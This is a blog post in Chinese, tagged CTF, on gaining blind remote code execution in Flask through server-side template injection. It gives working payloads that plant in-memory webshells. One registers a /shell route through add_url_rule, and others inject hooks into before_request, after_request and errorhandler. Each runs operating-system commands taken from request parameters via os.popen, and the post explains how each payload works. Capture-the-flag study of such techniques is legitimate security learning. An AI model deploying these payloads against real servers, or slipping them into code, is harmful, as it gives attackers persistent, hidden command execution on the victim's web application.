<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="debug模式如果程序开启了debug模式，那么一般是要计算pin值，计算出pin值就很简单了。 非debug模式0x01 旧版内存马低版本的flask(ssti)一般可以直接使用以下payload： 1url_for.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;app.add_url_rule(&#x27;&#x2F;shel">
<meta property="og:type" content="article">
<meta property="og:title" content="Flask无回显RCE">
<meta property="og:url" content="https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/index.html">
<meta property="og:site_name" content="Thr2on1&#39;s Blog">
<meta property="og:description" content="debug模式如果程序开启了debug模式，那么一般是要计算pin值，计算出pin值就很简单了。 非debug模式0x01 旧版内存马低版本的flask(ssti)一般可以直接使用以下payload： 1url_for.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;app.add_url_rule(&#x27;&#x2F;shel">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Thr2on1/BlogImages/main/img/Pasted%20image%2020250417093253.png">
<meta property="article:published_time" content="2025-05-29T08:48:51.000Z">
<meta property="article:modified_time" content="2025-05-29T09:40:29.487Z">
<meta property="article:author" content="Thr2on1">
<meta property="article:tag" content="WEB">
<meta property="article:tag" content="Flask">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Thr2on1/BlogImages/main/img/Pasted%20image%2020250417093253.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Flask无回显RCE</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/Thr2on1">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2026/02/02/HTB-Facts/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&text=Flask无回显RCE"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&is_video=false&description=Flask无回显RCE"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Flask无回显RCE&body=Check out this article: https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&name=Flask无回显RCE&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&t=Flask无回显RCE"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#debug%E6%A8%A1%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">debug模式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9Edebug%E6%A8%A1%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">非debug模式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-%E6%97%A7%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.1.</span> <span class="toc-text">0x01 旧版内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-%E6%96%B0%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.2.</span> <span class="toc-text">0x02 新版内存马</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-number">3.</span> <span class="toc-text">参考文章</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Flask无回显RCE
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Thr2on1</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-29T08:48:51.000Z" class="dt-published" itemprop="datePublished">2025-05-29</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/CTF/">CTF</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Flask/" rel="tag">Flask</a>, <a class="p-category" href="/tags/WEB/" rel="tag">WEB</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="debug模式"><a href="#debug模式" class="headerlink" title="debug模式"></a>debug模式</h2><p>如果程序开启了debug模式，那么一般是要计算pin值，计算出pin值就很简单了。</p>
<h2 id="非debug模式"><a href="#非debug模式" class="headerlink" title="非debug模式"></a>非debug模式</h2><h3 id="0x01-旧版内存马"><a href="#0x01-旧版内存马" class="headerlink" title="0x01 旧版内存马"></a>0x01 旧版内存马</h3><p>低版本的flask(ssti)一般可以直接使用以下payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&quot;app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read())&quot;,&#123;&#x27;_request_ctx_stack&#x27;:url_for.__globals__[&#x27;_request_ctx_stack&#x27;],&#x27;app&#x27;:url_for.__globals__[&#x27;current_app&#x27;]&#125;)</span><br></pre></td></tr></table></figure>
<p><strong>原理</strong>:</p>
<p>第一行利用url_for函数作为入口点获取了当前命名空间的__builtins__模块，然后调用eval函数。<br>这个eval传入了两个参数，看第二个</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">    &#x27;_request_ctx_stack&#x27;:url_for.__globals__[&#x27;_request_ctx_stack&#x27;],</span><br><span class="line">    &#x27;app&#x27;:url_for.__globals__[&#x27;current_app&#x27;]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里需要介绍一下eval的第二个参数：<br>eval的第二个参数允许传入一个字典，一般是用来指定表达式执行的<strong>全局变量命名空间（globals）</strong><br>接下来再去理解第二个参数中传入的值就很好了。<br><code>_request_ctx_stack</code>是一个请求上下文栈。请求上下文是指在处理HTTP请求的过程中，Flask创建的一个临时环境，用来存储和管理与当前请求相关的信息<br><code>url_for.__globals__[&#39;current_app&#39;]</code>是当前运行的app。<br>然后看一下执行的代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&quot;app.add_url_rule(</span><br><span class="line">        &#x27;/shell&#x27;, </span><br><span class="line">        &#x27;shell&#x27;, </span><br><span class="line">        lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read())&quot;</span><br></pre></td></tr></table></figure>
<p>app.add_url_rule()是一个可以用来动态的添加路由的方法，我们可以通过这个方法动态的添加一个路由，其中我们可以通过匿名函数来处理这个路由的请求。<br>为了获取我们注入的命令，我们还需要当前HTTP请求的request对象，这也就是我们一开始要获取<code>_request_ctx_stack</code>的原因。在这个栈里，栈顶元素_request_ctx_stack.top自然就是我们当前请求的上下文，其中包含request对象，于是我们就可以获取当前请求GET传参的值，进而执行我们传入的命令。</p>
<h3 id="0x02-新版内存马"><a href="#0x02-新版内存马" class="headerlink" title="0x02 新版内存马"></a>0x02 新版内存马</h3><p>比较新的flask版本，不允许我们在运行app的时候调用它的add_url_rule函数。<br>在阅读了大佬们写的文章后，我得知了可以使用flask自带的钩子函数，来达到注入内存马的目的。</p>
<p><strong>before_request</strong></p>
<p>before_request()是Flask下的一个解释器，服务端在处理请求之前会调用before_request所设置的回调函数对请求进行预处理，比如说，身份验证、权限检查等。<br>我们可以通过调用app.before_request_funcs.setdefault()函数来为我们的before_request设置处理函数，在SSTI的过程中我们需要获取到eval函数或者exec函数来插入内存马。<br>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__import__(&#x27;sys&#x27;).modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None,[]).append(lambda :__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read())</span><br></pre></td></tr></table></figure>
<p>跟旧版的一样，我们需要先获取上下文。<br>因此在eval执行命令的时候我们可以使用:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.before_request_funcs.setdefault(None,[]).append(lambda :__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read()),&#123;&#x27;app&#x27;:url_for.__globals__[&#x27;current_app&#x27;]&#125;</span><br></pre></td></tr></table></figure>
<p>但是原内容会被before_request的返回内容覆盖，我们可以使用after_request解决这个问题。</p>
<p><strong>after_request</strong></p>
<p>先看以下函数介绍：<br><img src="https://raw.githubusercontent.com/Thr2on1/BlogImages/main/img/Pasted%20image%2020250417093253.png" alt="Pasted image 20250417093253"><br>这个解释器要求我们接收一个response对象，并且返回一个response对象。因此我们在定义匿名函数的时候需要设置一个参数(默认为respose类型)<br>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">app.after_request_funcs.setdefault(None,[]).append(lambda resp: make_response(__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;cmd&#x27;)).read()) if request.args.get(&#x27;cmd&#x27;) else resp)</span><br></pre></td></tr></table></figure>
<p>SSTI中用法跟before_request一样。</p>
<p><strong>teardown_request</strong></p>
<p>跟after_request用法一模一样，但是没有回显。</p>
<p><strong>errorhandler</strong></p>
<p>errorhandler装饰器允许我们自定义报错界面<br>比如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">@app.errorhandler(404)</span><br><span class="line">def error():</span><br><span class="line">	return &quot;404!!!&quot;</span><br></pre></td></tr></table></figure>
<p>通过errorhandler绑定一个钩子函数，然后HTTP状态码为404时就调用我们自定义的函数，那么我们就可以加以利用。<br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">exec(&quot;global exc_class;global code;exc_class, code = app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda a:__import__(&#x27;os&#x27;).popen(request.args.get(&#x27;gxngxngxn&#x27;)).read()&quot;)</span><br></pre></td></tr></table></figure>
<p>要用exec执行命令，eval不支持执行多条python命令。</p>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/gxngxngxn/p/18181936">新版FLASK下python内存马的研究 - gxngxngxn - 博客园</a></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/categories/">Category</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/Thr2on1">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#debug%E6%A8%A1%E5%BC%8F"><span class="toc-number">1.</span> <span class="toc-text">debug模式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9Edebug%E6%A8%A1%E5%BC%8F"><span class="toc-number">2.</span> <span class="toc-text">非debug模式</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0x01-%E6%97%A7%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.1.</span> <span class="toc-text">0x01 旧版内存马</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0x02-%E6%96%B0%E7%89%88%E5%86%85%E5%AD%98%E9%A9%AC"><span class="toc-number">2.2.</span> <span class="toc-text">0x02 新版内存马</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E6%96%87%E7%AB%A0"><span class="toc-number">3.</span> <span class="toc-text">参考文章</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&text=Flask无回显RCE"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&is_video=false&description=Flask无回显RCE"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Flask无回显RCE&body=Check out this article: https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&title=Flask无回显RCE"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&name=Flask无回显RCE&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://thr2on1.github.io/2025/05/29/Flask%E6%97%A0%E5%9B%9E%E6%98%BERCE/&t=Flask无回显RCE"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2025-2026
    Thr2on1
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/Thr2on1">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
